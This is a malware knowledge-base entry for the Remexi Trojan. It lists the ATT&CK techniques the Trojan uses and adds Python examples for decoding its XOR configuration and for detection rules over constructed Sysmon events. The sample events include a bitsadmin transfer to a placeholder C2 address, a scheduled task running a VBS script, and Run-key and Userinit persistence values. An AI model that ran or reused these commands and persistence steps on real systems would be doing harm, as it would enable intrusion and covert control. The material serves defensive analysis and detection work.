
S0375 Remexi

Remexi is a Windows-based Trojan that was developed in the C programming language. [1]

ID: S0375
Associated Names: (none)
Version: 1.1
Created: 17 April 2019
Last Modified: 30 March 2020

Techniques Used

Domain | ID | Name | Use
enterprise | T1071 | Application Layer Protocol | (parent technique; see the sub-technique below)
enterprise | T1071.001 | Web Protocols | Remexi uses BITSAdmin to communicate with the C2 server over HTTP. [1]
enterprise | T1010 | Application Window Discovery | Remexi has a command to capture the active windows on the machine and retrieve their window titles. [1]
enterprise | T1560 | Archive Collected Data | Remexi encrypts the gathered browser data and packs it into files for upload to the C2 server. [1]
enterprise | T1547 | Boot or Logon Autostart Execution | (parent technique; see the sub-techniques below)
enterprise | T1547.001 | Registry Run Keys / Startup Folder | Remexi uses Run Registry keys in the HKLM hive as a persistence mechanism. [1]
enterprise | T1547.004 | Winlogon Helper DLL | Remexi achieves persistence through the Userinit value under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon, which Winlogon executes at user logon. [1]
enterprise | T1115 | Clipboard Data | Remexi collects text from the clipboard. [1]
enterprise | T1059 | Command and Scripting Interpreter | (parent technique; see the sub-techniques below)
enterprise | T1059.003 | Windows Command Shell | Remexi silently executes received commands with cmd.exe. [1]
enterprise | T1059.005 | Visual Basic | Remexi uses AutoIt and VBS scripts throughout its execution process. [1]
enterprise | T1140 | Deobfuscate/Decode Files or Information | Remexi decrypts its configuration data using XOR with 25-character keys. [1]
enterprise | T1041 | Exfiltration Over C2 Channel | Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel. [1]
enterprise | T1083 | File and Directory Discovery | Remexi searches for files on the system. [1]
enterprise | T1056 | Input Capture | (parent technique; see the sub-technique below)
enterprise | T1056.001 | Keylogging | Remexi gathers and exfiltrates keystrokes from the machine. [1]
enterprise | T1027 | Obfuscated Files or Information | Remexi obfuscates its configuration data with XOR. [1]
enterprise | T1053 | Scheduled Task/Job | (parent technique; see the sub-technique below)
enterprise | T1053.005 | Scheduled Task | Remexi uses scheduled tasks as a persistence mechanism. [1]
enterprise | T1113 | Screen Capture | Remexi takes screenshots of windows of interest. [1]
enterprise | T1047 | Windows Management Instrumentation | Remexi executes received commands with wmic.exe (for WMI commands). [1]
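The T1140/T1027 rows above say the configuration is protected with repeating-key XOR using 25-character keys. The following is an added example, not code from the ATT&CK page or from any Remexi sample: it implements the decode, shows that with a 25-byte repeating key a single key period of known plaintext recovers the entire key, and parses the result. The key, the INI-style configuration text and the field names are constructed for this example; the only fact taken from the page is the key length.

```python
"""Repeating-key XOR config decoding (added example; key and config are constructed).

The only detail taken from the ATT&CK entry is the 25-character key length.
The INI-style layout of the plaintext is an assumption made for this example,
not a description of Remexi's real configuration format.
"""

KEY_LEN = 25  # 25-character keys, per the T1140 entry


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data against key cycled to the data length. Encrypt and decrypt are the same operation."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext: bytes, known_plaintext: bytes, key_len: int = KEY_LEN) -> bytes:
    """Recover a repeating key from a known-plaintext prefix.

    Each key byte is ciphertext XOR plaintext at the same offset, so one full
    key period (here 25 bytes) of known plaintext yields the whole key.
    """
    if len(known_plaintext) < key_len:
        raise ValueError(f"need at least {key_len} bytes of known plaintext, got {len(known_plaintext)}")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_plaintext[:key_len]))


def decode_config(blob: bytes, key: bytes) -> dict:
    """Decrypt an XORed blob and parse the assumed INI-style plaintext into {section: {key: value}}."""
    text = xor_repeating(blob, key).decode("ascii", errors="strict")
    cfg, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            cfg[section] = {}
        elif "=" in line and section is not None:
            k, v = line.split("=", 1)
            cfg[section][k.strip()] = v.strip()
    return cfg


# Constructed sample key (25 bytes) and config; neither comes from a real sample.
SAMPLE_KEY = b"k3y_material_for_example!"
assert len(SAMPLE_KEY) == KEY_LEN
SAMPLE_CONFIG = (
    b"[c2]\nurl=http://203.0.113.7/gate.php\n"
    b"[tasks]\nscreenshot=1\nkeylog=1\nbrowsers=1\n"
)
SAMPLE_BLOB = xor_repeating(SAMPLE_CONFIG, SAMPLE_KEY)


if __name__ == "__main__":
    # Analyst workflow: recover the key from a known prefix, then decode the blob.
    recovered = recover_key(SAMPLE_BLOB, SAMPLE_CONFIG[:KEY_LEN])
    print("recovered key:", recovered)
    print(decode_config(SAMPLE_BLOB, recovered))
```

The point for triage is the second function: repeating-key XOR offers no secrecy once 25 bytes of plaintext are known or guessable, so a config blob whose header is predictable can be decoded without locating the key in the binary.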
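Several rows in the table describe behaviour that leaves host telemetry: BITSAdmin transfers over HTTP (T1071.001, T1041), cmd.exe and wmic.exe launched by the implant (T1059.003, T1047), scheduled-task creation (T1053.005), and writes to Run keys and the Winlogon Userinit value (T1547.001, T1547.004). The script below is an added example, not code from the ATT&CK page or from any vendor detection content. It runs a handful of rules over constructed events shaped like Sysmon Event ID 1 (process creation) and Event ID 13 (registry value set) and maps each hit to the technique ID from the table. The events, paths and the heuristics (a parent process in a user-writable directory, a Userinit value that differs from the stock `userinit.exe,`) are the example's own assumptions.

```python
"""Triage of Sysmon-shaped events for the Remexi behaviours listed in the ATT&CK entry.

Added example; the events below are constructed, not real telemetry. Field names
follow Sysmon Event ID 1 (process creation) and Event ID 13 (registry value set).
"""
import re

# Directories a low-privileged implant can write to; used as a "suspicious origin" heuristic.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
# Stock Userinit value on Windows (note the trailing comma in the real value).
DEFAULT_USERINIT = r"c:\windows\system32\userinit.exe"


def from_user_writable(path: str) -> bool:
    return bool(USER_WRITABLE.search(path))


def userinit_tampered(details: str) -> bool:
    """True if the comma-separated Userinit value lists anything besides the stock userinit.exe."""
    parts = [p.strip().lower() for p in details.split(",") if p.strip()]
    return parts != [DEFAULT_USERINIT]


def rule_bits_http(ev: dict) -> bool:          # T1071.001 / T1041
    return (ev["EventID"] == 1 and ev["Image"].lower().endswith("\\bitsadmin.exe")
            and "/transfer" in ev["CommandLine"].lower()
            and re.search(r"https?://", ev["CommandLine"], re.I) is not None)


def rule_cmd_from_userland(ev: dict) -> bool:  # T1059.003
    return (ev["EventID"] == 1 and ev["Image"].lower().endswith("\\cmd.exe")
            and from_user_writable(ev["ParentImage"]))


def rule_wmic_from_userland(ev: dict) -> bool:  # T1047
    return (ev["EventID"] == 1 and ev["Image"].lower().endswith("\\wmic.exe")
            and from_user_writable(ev["ParentImage"]))


def rule_schtasks_create(ev: dict) -> bool:    # T1053.005
    cl = ev.get("CommandLine", "").lower()
    return (ev["EventID"] == 1 and ev["Image"].lower().endswith("\\schtasks.exe")
            and "/create" in cl
            and (from_user_writable(cl) or re.search(r"\b[wc]script\.exe", cl) is not None))


def rule_userinit(ev: dict) -> bool:           # T1547.004
    return (ev["EventID"] == 13
            and ev["TargetObject"].lower().endswith("\\winlogon\\userinit")
            and userinit_tampered(ev["Details"]))


def rule_run_key(ev: dict) -> bool:            # T1547.001
    return (ev["EventID"] == 13
            and re.search(r"\\currentversion\\run(once)?\\", ev["TargetObject"], re.I) is not None
            and (from_user_writable(ev["Details"]) or from_user_writable(ev["Image"])))


RULES = [
    ("T1071.001", "BITSAdmin HTTP transfer (C2 and exfil channel, also T1041)", rule_bits_http),
    ("T1059.003", "cmd.exe spawned from a user-writable path", rule_cmd_from_userland),
    ("T1047", "wmic.exe spawned from a user-writable path", rule_wmic_from_userland),
    ("T1053.005", "schtasks /create pointing at a script or user-writable path", rule_schtasks_create),
    ("T1547.004", "Winlogon Userinit value changed", rule_userinit),
    ("T1547.001", "Run key pointing at a user-writable path", rule_run_key),
]


def triage(events: list) -> list:
    """Return (event_index, technique_id, rule_name) for every rule that fires on every event."""
    return [(i, tid, name) for i, ev in enumerate(events) for tid, name, pred in RULES if pred(ev)]


# Constructed sample telemetry (not real logs). Indices 0-5 are malicious, 6-7 are benign noise.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Users\victim\AppData\Roaming\svchost.exe",
     "CommandLine": r"bitsadmin /transfer job1 /download /priority high http://203.0.113.7/up.php?id=42 C:\Users\victim\AppData\Local\Temp\out.txt"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\victim\AppData\Roaming\svchost.exe",
     "CommandLine": r'cmd.exe /c "dir C:\Users\victim\Documents /s > %TEMP%\ls.txt"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Users\victim\AppData\Roaming\svchost.exe",
     "CommandLine": r"wmic process list brief"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 30 /tn "WinUpdate" /tr "wscript.exe C:\ProgramData\u.vbs"'},
    {"EventID": 13, "Image": r"C:\Users\victim\AppData\Roaming\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
     "Details": r"C:\Windows\system32\userinit.exe,C:\ProgramData\u.exe"},
    {"EventID": 13, "Image": r"C:\Users\victim\AppData\Roaming\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate",
     "Details": r"C:\ProgramData\u.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"cmd.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\App\DisplayName",
     "Details": r"Some App"},
]


if __name__ == "__main__":
    for idx, tid, name in triage(EVENTS):
        print(f"event {idx}: {tid} {name}")
```

The Userinit check compares the whole comma-separated value against the stock entry rather than looking for a known bad path, so it also catches an appended loader that has never been seen before; the parent-path heuristic for cmd.exe and wmic.exe is deliberately narrow and should be widened to the process lineage available in the environment.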

Groups That Use This Software

ID | Name | References
G0087 | APT39 | [2][1][3]